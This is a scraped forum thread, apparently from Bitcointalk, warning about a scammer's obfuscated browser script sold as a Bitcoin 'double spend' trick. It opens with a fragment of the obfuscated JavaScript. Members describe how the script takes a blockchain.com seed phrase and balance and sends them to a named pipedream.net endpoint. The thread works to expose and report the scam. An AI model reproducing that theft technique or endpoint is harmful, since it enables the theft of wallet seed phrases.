_0x4ac853=_0x463864[_0x5b0650(0x502,0x4dd,0x4e3,0x4c6)+'r'][_0x5b0650(0x479,0x4e4,0x4db,0x4ba)][_0x5b0650(0x501,0x4ce,0x4ed,0x4fd)](_0x41d2fe),_0x40c3f4=_0x5292b2[_0x38be00],_0x2e9533=_0x4e8623[_0x40c3f4]||_0x4ac853;_0x4ac853[_0x5b0650(0x517,0x4f4,0x529,0x4f4)]=_0x3665c5[_0x25f51b(-0x8a,-0x83,-0x9e,-0xb5)](_0x44fd93),_0x4ac853[_0x5b0650(0x46f,0x478,0x4b5,0x4a2)]=_0x2e9533[_0x5b0650(0x4d7,0x486,0x4e2,0x4a2)][_0x25f51b(-0x4c,-0x83,-0x68,-0xc5)](_0x2e9533),_0x4e8623[_0x40c3f4]=_0x4ac853;}}}catch(_0x1d9796){}},0x1d57+-0x1b22+0x983*0x1);
 
//The end of the script is here


█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
If you see garbage posts (off-topic, trolling, spam, no point, etc.), use the "report to moderator" links. All reports are investigated, though you will rarely be contacted about your reports.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
1714533959
Hero Member
*
Offline Offline

Posts: 1714533959

View Profile Personal Message (Offline)

Ignore
1714533959
Reply with quote  #2

1714533959
Report to moderator
Oshosondy
Legendary
*
Offline Offline

Activity: 1428
Merit: 1123


Gamble responsibly


View Profile
April 12, 2024, 12:10:14 AM
 #2

We have discussed about this person and his previous accounts were banned but he keeps opening new accounts to spam this forum with his spam posts that contains malicious link.

What should be done for this kind of useless topic?

The best is to keep reporting him.

██
██
██
██
██
██
██
██
██
██
██
██
██
... LIVECASINO.io    Play Live Games with up to 20% cashback!...██
██
██
██
██
██
██
██
██
██
██
██
██
DaveF
Legendary
*
Offline Offline

Activity: 3458
Merit: 6254


Crypto Swap Exchange


View Profile WWW
April 12, 2024, 12:18:21 AM
 #3

Report and move on as of now he has 4 posts with the same link.
It will send all your BTC to their address.
But lets face it someone is going to click on it and loose all their BTC because they are greedy.

-Dave

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
UserU
Hero Member
*****
Offline Offline

Activity: 2016
Merit: 531


FREE passive income eBook @ tinyurl.com/PIA10


View Profile WWW
April 12, 2024, 04:58:58 AM
 #4

I've seen these kind of shit before.

While the contents might look innocuous, there are likely hidden additional scripts called in the code's function keyword elsewhere to send the funds to the bad actor's address.

Or the address is encrypted and broken up into chunks, then concatenated while calling them. For instance, inside a function that is obfuscated to the non-technical victim:

send to doubleSpend + bitcoinCasino;

where doubleSpend = crypto address part 1
and bitcoinCasino = crypto address part 2

.
.500 CASINO.██

  ▄

.
THE HOTTEST CRYPTO
CASINO & SPORTSBOOK
         ▄▄▄███████████
 ▄▄▄████████████████

▐████████████████████
 ██████████████████
 ▐██████████████████
 ▐█████████████████
  ██████████████████
  ██████▀█████▀█████
  ▐████████████████
  ▐██████████████
   █████████████████
   ▐██████████████████
    ▀██████▀▀▀▀▀▀   ▀▀▀█
▄▄▄▀▀▀▀▀▀▀▄▄▄
▄▄▀▀▄ ▄ ▀ ▀ ▀ ▄ ▄▀▀▄▄
▄▀▄ ▀               ▀ ▄▀▄
█ ▄                     ▄ █
█ ▄  █████  ▄███▄  ▄███▄  ▄ █
█ ▄   ██▄▄   ██ ██  ██ ██   ▄ █
█ ▄   ▀▀▀██  ██ ██  ██ ██   ▄ █
█ ▄   ▄▄ ██  ██ ██  ██ ██   ▄ █
█ ▄  ▀███▀  ▀███▀  ▀███▀  ▄ █
█ ▄                     ▄ █
▀▄ ▀ ▄             ▄ ▀ ▄▀
▀▀▄▄ ▀ ▄ ▄ ▄ ▄ ▀ ▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▀▀▀

▄▄▄██████████▄▄▄
████████▀██▀▀██▄▄
 █
█████████████████▄
 █
████████████████████
  █
██▄████▄███████▄███
  █
████████████████████
  █
███▀████▀███████▀███
 █
████████████████████
 █
█████████████████▀
█████████▄██▄▄██▀▀
 ▀▀▀██████████▀▀▀

ORIGINALS

SLOTS

LIVE GAMES

SPORTSBOOK



.
██..PLAY NOW..
FatFork
Legendary
*
Offline Offline

Activity: 1582
Merit: 2587


Top Crypto Casino


View Profile WWW
April 12, 2024, 08:18:29 AM
Merited by hugeblack (4), BlackHatCoiner (4), logfiles (2)
 #5

Help is needed to decode the script for those who have some knowledge about code. I want to use it as evidence to report his google drive account.

Here's a partially decoded (deobfuscated) script:
https://pastebin.com/U7jpXWwk

If my understanding is correct, it looks like to be designed to send your backup seed phrase words to "https:// eoszaaexw5ctdb6.m.pipedream.net"

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
Alphakilo
Full Member
***
Offline Offline

Activity: 309
Merit: 132


Cashback 15%


View Profile
April 12, 2024, 01:59:27 PM
 #6

What happened: shunato8 claims you can make $1,000 from Bitcoin casinos / sportsbook sites by running a script on Tampermonkey that can "double spend" bitcoin even after one confirmation. Obviously this is not true

The script is probably malicious and might just steal funds from your wallet

Scammers Profile Link: https://bitcointalk.org/index.php?action=profile;u=3622803

Reference Link: https://bitcointalk.org/index.php?topic=5492483.0
Archived: https://ninjastic.space/post/63933509

Additional Notes:
All his topics are also closed, which is suspicious.

Help is needed to decode the script for those who have some knowledge about code. I want to use it as evidence to report his google drive account.

PLEASE, THE SCRIPT IS MOST LIKELY MALICIOUS. DO NOT COPY, PASTE OR RUN IT IF YOU HAVE NO IDEA
Wait a minute isn't this scammer -shunato8, the same person as Bakusio who Oshosondy had written about in this thread What should be done for this kind of useless topic?.
Anyways, I wouldn't worry about the person because they won't be here for long. They will naturally look for another forum where scams and scammers are accepted. He should be reported to the moderators as many times as possible.

Cantsay
Hero Member
*****
Offline Offline

Activity: 728
Merit: 554


Top Crypto Casino


View Profile WWW
April 12, 2024, 07:50:49 PM
 #7

@shunato8 has been banned and now they are back with a different account, @BANDURA89

Since they keep using the same google drive link, would it be possible for the link to be filtered so that anyone user that post the link would get banned immediately because I feel they’ll keep on creating more account just to spread this fake script of theirs.

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
BlackHatCoiner
Legendary
*
Offline Offline

Activity: 1498
Merit: 7340


Farewell, Leo


View Profile
April 12, 2024, 08:01:00 PM
Merited by logfiles (2)
 #8

While the contents might look innocuous, there are likely hidden additional scripts called in the code's function keyword elsewhere to send the funds to the bad actor's address.
The content absolutely does not look innocuous. It's called obfuscated Javascript for a reason. It is deliberately written in such a way that is not human readable.

If my understanding is correct, it looks like to be designed to send your backup seed phrase words to "https:// eoszaaexw5ctdb6.m.pipedream.net"
Yes. Basically, the script opens your blockchain.com account in a new window, clicks the backup button, stores your seed phrase in _0x4d583d, and if it is not empty (in case it didn't work out), it sends it over to that pipedream URL. It also send your balance to make his life easier from checking. What an organized scum.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
logfiles (OP)
Copper Member
Legendary
*
Offline Offline

Activity: 1960
Merit: 1643


Top Crypto Casino


View Profile WWW
April 12, 2024, 11:35:49 PM
 #9

The best is to keep reporting him.

Report and move on as of now he has 4 posts with the same link.
Of course, I am not ignoring the reporting in the forum. The person behind this scam is actually posting in other forums too. So;

1. I wanted this thread to be a reference for those who could have seen the malicious script else where but wanted to first carry out due diligence
2. I am going to be reporting his Google Drive accounts with this thread as reference. That's where he uploads his script as of now. Knowing how the malicious code works is also important.



Thanks, @FatFork and @BlackHatCoiner

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
CODE200
Sr. Member
****
Offline Offline

Activity: 1428
Merit: 308


★Bitvest.io★ Play Plinko or Invest!


View Profile
April 13, 2024, 09:18:01 AM
 #10

Would be awesome if there's a way that someone that's got the tech skills to demonstrate how this scammer will steal the funds in your wallet, I'm really curious about that part that I need to see a demonstration. I've seen my teacher back in my IT subject hack the WiFi of the school, open up the cameras of the computers that we've got, that's why I'm curious if it's possible to see a demonstration. Fighting these scammers is never ending, I hope that someday they find it in their heart to find a job, and an honest one at that because people will only get smarter when it comes to scams, and eventually, they'll lose potential victims.



BIG WINNER!
[15.00000000 BTC]


▄████████████████████▄
██████████████████████
██████████▀▀██████████
█████████░░░░█████████
██████████▄▄██████████
███████▀▀████▀▀███████
██████░░░░██░░░░██████
███████▄▄████▄▄███████
████▀▀████▀▀████▀▀████
███░░░░██░░░░██░░░░███
████▄▄████▄▄████▄▄████
██████████████████████
▀████████████████████▀
▄████████████████████▄
██████████████████████
█████▀▀█▀▀▀▀▀▀██▀▀████
█████░░░░░░░░░░░░░▄███
█████░░░░░░░░░░░░▄████
█████░░▄███▄░░░░██████
█████▄▄███▀░░░░▄██████
█████████░░░░░░███████
████████░░░░░░░███████
███████░░░░░░░░███████
███████▄▄▄▄▄▄▄▄███████
██████████████████████
▀████████████████████▀
▄████████████████████▄
███████████████▀▀▀▀▀▀▀
███████████▀▀▄▄█░░░░░█
█████████▀░░█████░░░░█
███████▀░░░░░████▀░░░▀
██████░░░░░░░░▀▄▄█████
█████░▄░░░░░▄██████▀▀█
████░████▄░███████░░░░
███░█████░█████████░░█
███░░░▀█░██████████░░█
███░░░░░░████▀▀██▀░░░░
███░░░░░░███░░░░░░░░░░
▀██░▄▄▄▄░████▄▄██▄░░░░
▄████████████▀▀▀▀▀▀▀██▄
█████████████░█▀▀▀█░███
██████████▀▀░█▀░░░▀█░▀▀
███████▀░▄▄█░█░░░░░█░█▄
████▀░▄▄████░▀█░░░█▀░██
███░▄████▀▀░▄░▀█░█▀░▄░▀
█▀░███▀▀▀░░███░▀█▀░███░
▀░███▀░░░░░████▄░▄████░
░███▀░░░░░░░█████████░░
░███░░░░░░░░░███████░░░
███▀░██░░░░░░▀░▄▄▄░▀░░░
███░██████▄▄░▄█████▄░▄▄
▀██░████████░███████░█▀
▄████████████████████▄
████████▀▀░░░▀▀███████
███▀▀░░░░░▄▄▄░░░░▀▀▀██
██░▀▀▄▄░░░▀▀▀░░░▄▄▀▀██
██░▄▄░░▀▀▄▄░▄▄▀▀░░░░██
██░▀▀░░░░░░█░░░░░██░██
██░░░▄▄░░░░█░██░░░░░██
██░░░▀▀░░░░█░░░░░░░░██
██░░░░░▄▄░░█░░░░░██░██
██▄░░░░▀▀░░█░██░░░░░██
█████▄▄░░░░█░░░░▄▄████
█████████▄▄█▄▄████████
▀████████████████████▀




Rainbot
Daily Quests
Faucet
decodx
Hero Member
*****
Offline Offline

Activity: 1414
Merit: 928


🇺🇦 Glory to Ukraine!


View Profile
April 13, 2024, 09:49:18 AM
 #11

Would be awesome if there's a way that someone that's got the tech skills to demonstrate how this scammer will steal the funds in your wallet, I'm really curious about that part that I need to see a demonstration.
<...>

Read the previous reply from BlackHatCoiner. The script essentially gains access to your backup seed phrase from your Blockchain.com account and then sends it to the scammer. After that, it's only a matter of time before the scammer empties your wallet. They probably have an automated process set up on their end as well.

R


▀▀▀▀▀▀▀██████▄▄
████████████████
▀▀▀▀█████▀▀▀█████
████████▌███▐████
▄▄▄▄█████▄▄▄█████
████████████████
▄▄▄▄▄▄▄██████▀▀
LLBIT|
4,000+ GAMES
███████████████████
██████████▀▄▀▀▀████
████████▀▄▀██░░░███
██████▀▄███▄▀█▄▄▄██
███▀▀▀▀▀▀█▀▀▀▀▀▀███
██░░░░░░░░█░░░░░░██
██▄░░░░░░░█░░░░░▄██
███▄░░░░▄█▄▄▄▄▄████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
█████████
▀████████
░░▀██████
░░░░▀████
░░░░░░███
▄░░░░░███
▀█▄▄▄████
░░▀▀█████
▀▀▀▀▀▀▀▀▀
█████████
░░░▀▀████
██▄▄▀░███
█░░█▄░░██
░████▀▀██
█░░█▀░░██
██▀▀▄░███
░░░▄▄████
▀▀▀▀▀▀▀▀▀
|
██░░░░░░░░░░░░░░░░░░░░░░██
▀█▄░▄▄░░░░░░░░░░░░▄▄░▄█▀
▄▄███░░░░░░░░░░░░░░███▄▄
▀░▀▄▀▄░░░░░▄▄░░░░░▄▀▄▀░▀
▄▄▄▄▄▀▀▄▄▀▀▄▄▄▄▄
█░▄▄▄██████▄▄▄░█
█░▀▀████████▀▀░█
█░█▀▄▄▄▄▄▄▄▄██░█
█░█▀████████░█
█░█░██████░█
▀▄▀▄███▀▄▀
▄▀▄
▀▄▄▄▄▀▄▀▄
██▀░░░░░░░░▀██
||.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
░▀▄░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░▄▀
███▀▄▀█████████████████▀▄▀
█████▀▄░▄▄▄▄▄███░▄▄▄▄▄▄▀
███████▀▄▀██████░█▄▄▄▄▄▄▄▄
█████████▀▄▄░███▄▄▄▄▄▄░▄▀
███████████░███████▀▄▀
███████████░██▀▄▄▄▄▀
███████████░▀▄▀
████████████▄▀
███████████
▄▄███████▄▄
▄████▀▀▀▀▀▀▀████▄
▄███▀▄▄███████▄▄▀███▄
▄██▀▄█▀▀▀█████▀▀▀█▄▀██▄
▄██▄██████▀████░███▄██▄
███░████████▀██░████░███
███░████░█▄████▀░████░███
███░████░███▄████████░███
▀██▄▀███░█████▄█████▀▄██▀
▀██▄▀█▄▄▄██████▄██▀▄██▀
▀███▄▀▀███████▀▀▄███▀
▀████▄▄▄▄▄▄▄████▀
▀▀███████▀▀
OFFICIAL PARTNERSHIP
FAZE CLAN
SSC NAPOLI
|
Faisal2202
Sr. Member
****
Offline Offline

Activity: 1190
Merit: 466


#SWGT CERTIK Audited


View Profile WWW
April 15, 2024, 05:29:00 PM
 #12

Yes. Basically, the script opens your blockchain.com account in a new window, clicks the backup button, stores your seed phrase in _0x4d583d, and if it is not empty (in case it didn't work out), it sends it over to that pipedream URL. It also send your balance to make his life easier from checking. What an organized scum.
But how this script will get our seedphrase from blockchain.com, I am not using blockchain.com, which means if I run it I will be safe, as I have metamask seed phrase, which according to you will be safe? And I am not a technical person but what's the pipedream URL here, is it mean those pipes that are used in programming for like workflow? But why do hackers prefer a pipe system to store the data? Is it the best way?

Besides, I was thinking of giving this code to an AI chatbot, so that I could ask him the same question that OP has asked, but I stopped because I knew Chat would run this in its environment, so the question is, will it really run it, and will it affect my computer. Thanks. And many members said not to open the PDF that this scammer is providing, but I think OP has downloaded it and opened it as well! CMIIW,

PS: BTW this user has really gained a lot of attraction in the last 20 days maybe, as many members have made topics on his/her different profiles, doing the same thing.

Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!